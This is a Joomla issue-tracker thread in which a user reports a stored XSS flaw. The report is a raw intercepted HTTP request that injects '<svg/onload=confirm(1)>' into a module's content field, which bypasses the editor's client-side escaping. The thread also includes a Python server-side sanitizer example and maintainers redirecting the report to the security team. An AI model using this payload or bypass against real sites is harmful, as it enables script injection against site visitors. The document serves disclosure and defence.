wsfengfan
6 Jan 2021


POST /joomla-cms-staging/index.php/component/config/ HTTP/1.1
Host: 192.168.5.15
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 1898
Origin: http://192.168.5.15
Connection: close
Referer: http://192.168.5.15/joomla-cms-staging/index.php?option=com_config&controller=config.display.modules&id=83&Itemid=0&return=aHR0cDovLzE5Mi4xNjguNS4xNS9qb29tbGEtY21zLXN0YWdpbmcvaW5kZXgucGhwP29wdGlvbj1jb21fY29uZmlnJmNvbnRyb2xsZXI9Y29uZmlnLmRpc3BsYXkubW9kdWxlcyZpZD04MyZJdGVtaWQ9MCZyZXR1cm49YUhSMGNEb3ZMekU1TWk0eE5qZ3VOUzR4TlM5cWIyOXRiR0V0WTIxekxYTjBZV2RwYm1jdmFXNWtaWGd1Y0dod0wyTnZiWEJ2Ym1WdWRDOWpiMjVtYVdjdlAyTnZiblJ5YjJ4c1pYSTlZMjl1Wm1sbkxtUnBjM0JzWVhrdWJXOWtkV3hsY3lacFpEMDRNeVp5WlhSMWNtNDlZVWhTTUdORWIzWk1la1UxVFdrMGVFNXFaM1ZPVXpSNFRsTTVjV0l5T1hSaVIwVjBXVEl4ZWt4WVRqQlpWMlJ3WW0xamRtRlhOV3RhV0dkMVkwZG9kMHd5VG5aaVdFSjJZbTFXZFdSRE9XcGlNalZ0WVZkamRsQXlUblppYmxKNVlqSjRjMXBZU1RsWk1qbDFXbTFzYmt4dFVuQmpNMEp6V1ZocmRXSlhPV3RrVjNoc1kzbGFjRnBFTURSTmVWcDVXbGhTTVdOdE5EbFpWV2hUVFVkT1JXSXpXazFsYTFVeFZGZHJNR1ZGTlhGYU0xWlBWWHBTTkZSc1RUVmpWMGw1VDFoU2FWSXdWakJYVkVsNFpXdDRXVlJxUWxwV01sSjNXVzB4YW1SdFJsaE9WM1JoVjBka01Wa3daRzlrTUhkNVZtMTBhRmRHUmpCWk1HaExaR3h3ZEdKSVRtRlZWREE1
Cookie: 0f78a3a48a290132501d992011c5a490=d8ebj07g33dtmh58se3utlkjvo; joomla_user_state=logged_in
Upgrade-Insecure-Requests: 1

jform%5Btitle%5D=Side+Module&jform%5Bshowtitle%5D=1&jform%5Bposition%5D=position-7&jform%5Bpublished%5D=1&jform%5Bpublish_up%5D=&jform%5Bpublish_down%5D=&jform%5Baccess%5D=1&jform%5Bordering%5D=1&jform%5Blanguage%5D=*&jform%5Bnote%5D=&jform%5Bparams%5D%5Bprepare_content%5D=1&jform%5Bparams%5D%5Bbackgroundimage%5D=&jform%5Bparams%5D%5Blayout%5D=_%3Adefault&jform%5Bparams%5D%5Bmoduleclass_sfx%5D=&jform%5Bparams%5D%5Bcache%5D=1&jform%5Bparams%5D%5Bcache_time%5D=900&jform%5Bparams%5D%5Bcachemode%5D=static&jform%5Bparams%5D%5Bmodule_tag%5D=div&jform%5Bparams%5D%5Bbootstrap_size%5D=0&jform%5Bparams%5D%5Bheader_tag%5D=h3&jform%5Bparams%5D%5Bheader_class%5D=&jform%5Bparams%5D%5Bstyle%5D=0&jform%5Bcontent%5D=%3Cp%3EThis+is+a+module+where+you+might+want+to+add+some+more+information+or+an+image%2C+a+link+to+your+social+media+presence%2C+or+whatever+makes+sense+for+your+site.%3C%2Fp%3E%0D%0A%3Cp%3EYou+can+edit+this+module+in+the+module+manager.+Look+for+the+Side+Module.%3C%2Fp%3E<svg/onload=confirm(1)>&id=83&return=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&task=config.save.modules.apply&58921617fdc2db11481c8464ca1bd648=1


wsfengfan - open - 6 Jan 2021
joomla-cms-bot - change - 6 Jan 2021
Labels Added: ?
joomla-cms-bot - labeled - 6 Jan 2021
wsfengfan - comment - 6 Jan 2021
jform%5Bcontent%5D=%3Cp%3EThis+is+a+module+where+you+might+want+to+add+some+more+information+or+an+image%2C+a+link+to+your+social+media+presence%2C+or+whatever+makes+sense+for+your+site.%3C%2Fp%3E%0D%0A%3Cp%3EYou+can+edit+this+module+in+the+module+manager.+Look+for+the+Side+Module.%3C%2Fp%3E%0D%0A%3Cp%3E%26lt%3Bsvg%2Fonload%3Dconfirm%281%29%26gt%3B%3C%2Fp%3E<svg/onload=confirm(1)>
wsfengfan - comment - 6 Jan 2021

The editor has already escaped special characters on the front end, but by using Burp Suite to intercept the request packet and make changes, directly adding XSS statements, it executes successfully.
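
The bypass described in this comment works because the escaping happens only in the browser, so anything the server accepts must be sanitised again on the server side. The following is an added example in Python, not Joomla's own code: the request body excerpt is constructed from the report's `jform[content]` field, and the tag/attribute allowlist is an assumption about what a module editor needs to keep.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs

# Constructed excerpt of the intercepted body: the editor's client-side escaping produced
# "&lt;svg...&gt;" (inert text), while a raw "<svg/onload=confirm(1)>" was appended later.
RAW_BODY = (
    "jform%5Btitle%5D=Side+Module&jform%5Bcontent%5D=%3Cp%3EYou+can+edit+this+module.%3C%2Fp%3E"
    "%0D%0A%3Cp%3E%26lt%3Bsvg%2Fonload%3Dconfirm%281%29%26gt%3B%3C%2Fp%3E<svg/onload=confirm(1)>"
    "&id=83&task=config.save.modules.apply"
)

# Assumed allowlist for module content; anything not listed is dropped or re-escaped.
ALLOWED_TAGS = {"p", "br", "strong", "em", "a", "ul", "ol", "li"}
ALLOWED_ATTRS = {"a": {"href"}}
SAFE_URL_PREFIXES = ("http://", "https://", "mailto:", "/")

class AllowlistSanitizer(HTMLParser):
    """Re-serialises only allowlisted tags/attributes; all text nodes are re-escaped."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            return  # unknown element (svg here) is dropped together with its on* handlers
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()) or value is None:
                continue  # drops every event handler and any attribute not on the allowlist
            if name == "href" and not value.strip().lower().startswith(SAFE_URL_PREFIXES):
                continue  # rejects javascript:, data: and similar URL schemes
            kept.append(' %s="%s"' % (name, html.escape(value)))
        self.out.append("<%s%s>" % (tag, "".join(kept)))

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS:
            self.out.append("</%s>" % tag)

    def handle_data(self, data):
        self.out.append(html.escape(data))  # "&lt;svg&gt;" text stays text

def sanitize_html(fragment):
    parser = AllowlistSanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out)

def sanitize_module_content(body):
    """Server-side sanitisation of jform[content], independent of what the editor did."""
    fields = parse_qs(body, keep_blank_values=True)
    return sanitize_html(fields.get("jform[content]", [""])[0])
```

Running `sanitize_module_content(RAW_BODY)` keeps the two paragraphs and the escaped `&lt;svg/onload=confirm(1)&gt;` text, and drops the raw `<svg/onload=confirm(1)>` element entirely.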

brianteeman - comment - 6 Jan 2021

Security issues should NOT be reported on this repository.

If you believe you have found a security issue, please contact the Joomla Security Strike Team via email at security@joomla.org or through the contact form at https://developer.joomla.org/security/contact-the-team.html.

Please see https://developer.joomla.org/security.html for more information on how the Joomla project responds to security issues.

HLeithner - comment - 6 Jan 2021

@wsfengfan, as Brian said, please don't report security issues in the public tracker. I'm transferring the issue to the security repo, thanks.

And please contact the security team at security@joomla.org for feedback requests.
